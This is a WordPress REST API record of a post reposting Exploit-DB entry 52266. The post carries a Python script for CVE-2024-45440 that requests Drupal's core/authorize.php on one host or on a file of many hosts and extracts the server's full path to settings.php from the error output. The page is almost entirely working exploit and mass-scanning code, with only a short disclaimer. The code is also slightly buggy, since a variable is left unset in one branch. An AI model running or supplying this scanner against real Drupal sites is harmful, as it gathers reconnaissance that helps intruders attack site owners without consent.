{"id":233,"date":"2025-04-19T18:35:59","date_gmt":"2025-04-19T18:35:59","guid":{"rendered":"http:\/\/localhost\/?p=233"},"modified":"2025-04-19T18:35:59","modified_gmt":"2025-04-19T18:35:59","slug":"drupal-11x-dev-full-path-disclosure","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=233","title":{"rendered":"Drupal 11.x-dev &#8211; Full Path Disclosure"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Drupal 11.x-dev &#8211; Full Path Disclosure<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52266<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-19T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-19T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">5.3<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ffaa00; font-weight: bold;\">MEDIUM<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:N\/A:N<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2024-45440<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\n!\/usr\/bin\/env python Exploit Title: Drupal 11.x-dev &#8211; Full Path Disclosure Date: 2025-04-16 Exploit Author: Milad Karimi (Ex3ptionaL) Contact:&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n#!\/usr\/bin\/env python<br \/>\n<br \/># Exploit Title: Drupal 11.x-dev &#8211; Full Path Disclosure<br \/>\n<br \/># Date: 2025-04-16<br \/>\n<br \/># Exploit Author: Milad Karimi (Ex3ptionaL)<br \/>\n<br \/># Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL<br \/>\n<br \/># MiRROR-H: https:\/\/mirror-h.org\/search\/hacker\/49626\/<br \/>\n<br \/># Version: 11.x-dev<br \/>\n<br \/># CVE: CVE-2024-45440<\/p>\n<p># -*- coding:UTF-8 -*-<br \/>\n<br \/>import re<br \/>\n<br \/>import requests<br \/>\n<br \/>def banners():<br \/>\n<br \/>    cve_id = &#8220;CVE-2024-45440&#8221;<br \/>\n<br \/>    description = &#8220;Drupal 11.x-dev Full Path Disclosure Vulnerability: &#8221; \\<br \/>\n<br \/>                  &#8220;core\/authorize.php allows Full Path Disclosure (even<br \/>\n<br \/>when error logging is None) &#8221; \\<br \/>\n<br \/>                  &#8220;if the value of hash_salt is file_get_contents of a file<br \/>\n<br \/>that does not exist.&#8221;<br \/>\n<br \/>    disclaimer = &#8220;This tool is for educational purposes only. Any misuse of<br \/>\n<br \/>this information is the responsibility of &#8221; \\<br \/>\n<br \/>                 &#8220;the person utilizing this tool. The author assumes no<br \/>\n<br \/>responsibility or liability for any misuse or &#8221; \\<br \/>\n<br \/>                 &#8220;damage caused by this program.&#8221;<br \/>\n<br \/>    width = 100<br \/>\n<br \/>    banner_top_bottom = &#8220;=&#8221; * width<br \/>\n<br \/>    banner_middle = f&#8221;{cve_id:^{width}}\\n\\n{description:^{width}}&#8221;<br \/>\n<br \/>    banner =<br \/>\n<br \/>f&#8221;{banner_top_bottom}\\n\\n{banner_middle}\\n\\n{disclaimer}\\n\\n{banner_top_bottom}&#8221;<\/p>\n<p>    return banner<br \/>\n<br \/>def scan_single_url(url=None):<br \/>\n<br \/>    if url is None:<br \/>\n<br \/>        print(&#8220;[+] Input the IP\/Domain Example: 127.0.0.1 or 127.0.0.1:8080&#8221;)<\/p>\n<p>        url = input(&#8220;[+] IP\/Domain: &#8220;)<br \/>\n<br \/>    if not url.startswith(&#8216;https:\/\/&#8217;) and not url.startswith(&#8216;http:\/\/&#8217;):<br \/>\n<br \/>        full_url = &#8216;http:\/\/&#8217; + url + &#8216;\/core\/authorize.php&#8217;<br \/>\n<br \/>    print(&#8220;[*] Scanning&#8230;&#8221;)<br \/>\n<br \/>    try:<br \/>\n<br \/>        headers = {<br \/>\n<br \/>            &#8220;Host&#8221;: url,<br \/>\n<br \/>            &#8220;User-Agent&#8221;: &#8220;Mozilla\/5.0 (Windows NT 10.0; Win64; x64;<br \/>\n<br \/>rv:133.0) Gecko\/20100101 Firefox\/133.0&#8243;,<br \/>\n<br \/>            &#8220;Accept&#8221;:<br \/>\n<br \/>&#8220;text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8&#8221;,<br \/>\n<br \/>            &#8220;Accept-Language&#8221;:<br \/>\n<br \/>&#8220;zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2&#8221;<br \/>\n<br \/>        }<br \/>\n<br \/>        response = requests.get(full_url, headers,timeout=10)<br \/>\n<br \/>        pattern = r&#8217;<em class=\"placeholder\">(\/.*?settings\\.php)&#8217;<br \/>\n<br \/>        matches = re.findall(pattern, response.text)<br \/>\n<br \/>        # print(response.text)<br \/>\n<br \/>        if &#8216;settings.php&#8217; in response.text:<br \/>\n<br \/>            print(f&#8221;[+] {url} Existed!&#8221;)<br \/>\n<br \/>            for match in matches:<br \/>\n<br \/>                print(&#8220;[+] The full path is:&#8221;, match)<br \/>\n<br \/>                return True<br \/>\n<br \/>        else:<br \/>\n<br \/>            print(f&#8221;[-] {url} Not Exist!&#8221;)<br \/>\n<br \/>            return False<br \/>\n<br \/>    except TimeoutError:<br \/>\n<br \/>        print(f&#8221;[-] {url} Timeout!&#8221;)<br \/>\n<br \/>    except Exception as e:<br \/>\n<br \/>        print(f&#8221;[-] {url} Failed!&#8221;)<br \/>\n<br \/>        return False<br \/>\n<br \/>def scan_multiple_urls():<br \/>\n<br \/>    print(&#8220;[+] Input the path of txt Example: .\/url.txt or<br \/>\n<br \/>C:\\\\the\\\\path\\\\to\\\\url.txt&#8221;)<br \/>\n<br \/>    url_path = input(&#8220;[+] Path: &#8220;)<br \/>\n<br \/>    url_list = []<br \/>\n<br \/>    result_list = []<br \/>\n<br \/>    try:<br \/>\n<br \/>        with open(url_path, &#8216;r&#8217;, encoding=&#8217;utf-8&#8242;) as f:<br \/>\n<br \/>            lines = f.readlines()<br \/>\n<br \/>            for line in lines:<br \/>\n<br \/>                url_list.append(line.strip())<br \/>\n<br \/>    except FileNotFoundError as e:<br \/>\n<br \/>        print(&#8220;[-] File Not Found!&#8221;)<br \/>\n<br \/>    for url in url_list:<br \/>\n<br \/>        result = scan_single_url(url)<br \/>\n<br \/>        if result:<br \/>\n<br \/>            result_list.append(url)<br \/>\n<br \/>    print(&#8220;[+] Successful Target:&#8221;)<br \/>\n<br \/>    for result in result_list:<br \/>\n<br \/>        print(f&#8221;[+] {result}&#8221;)<br \/>\n<br \/>def main():<br \/>\n<br \/>    print(banners())<br \/>\n<br \/>    print(&#8220;[1] Scan single url\\n[2] Scan multiple urls&#8221;)<br \/>\n<br \/>    choice = input(&#8220;[+] Choose: &#8220;)<br \/>\n<br \/>    if choice == &#8216;1&#8217;:<br \/>\n<br \/>        scan_single_url()<br \/>\n<br \/>    elif choice == &#8216;2&#8217;:<br \/>\n<br \/>        scan_multiple_urls()<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(&#8220;[-] Invalid option selected!&#8221;)<br \/>\n<br \/>    pass<br \/>\n<br \/>if __name__ == &#8216;__main__&#8217;:<br \/>\n<br \/>    main()\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52266\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Drupal 11.x-dev &#8211; Full Path Disclosure Exploit ID EDB-ID:52266 Type exploitdb Published 2025-04-19T00:00:00 Modified 2025-04-19T00:00:00 CVSS Information CVSS Score&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,22,12,40,21,13,7,11,5],"class_list":["post-233","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-53","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Drupal 11.x-dev - Full Path Disclosure - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=233\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Drupal 11.x-dev - Full Path Disclosure - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Drupal 11.x-dev &#8211; Full Path Disclosure Exploit ID EDB-ID:52266 Type exploitdb Published 2025-04-19T00:00:00 Modified 2025-04-19T00:00:00 CVSS Information CVSS Score...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=233\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-19T18:35:59+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=233#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=233\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Drupal 11.x-dev &#8211; Full Path Disclosure\",\"datePublished\":\"2025-04-19T18:35:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=233\"},\"wordCount\":524,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-5.3\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=233#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=233\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=233\",\"name\":\"Drupal 11.x-dev - Full Path Disclosure - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-19T18:35:59+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=233#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=233\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=233#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Drupal 11.x-dev &#8211; Full Path Disclosure\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Drupal 11.x-dev - Full Path Disclosure - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=233","og_locale":"en_US","og_type":"article","og_title":"Drupal 11.x-dev - Full Path Disclosure - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Drupal 11.x-dev &#8211; Full Path Disclosure Exploit ID EDB-ID:52266 Type exploitdb Published 2025-04-19T00:00:00 Modified 2025-04-19T00:00:00 CVSS Information CVSS Score...","og_url":"https:\/\/zero.redgem.net\/?p=233","og_site_name":"zero redgem","article_published_time":"2025-04-19T18:35:59+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=233#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=233"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Drupal 11.x-dev &#8211; Full Path Disclosure","datePublished":"2025-04-19T18:35:59+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=233"},"wordCount":524,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-5.3","exploit","exploitdb","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=233#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=233","url":"https:\/\/zero.redgem.net\/?p=233","name":"Drupal 11.x-dev - Full Path Disclosure - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-19T18:35:59+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=233#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=233"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=233#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Drupal 11.x-dev &#8211; Full Path Disclosure"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/233","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=233"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/233\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=233"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=233"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=233"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}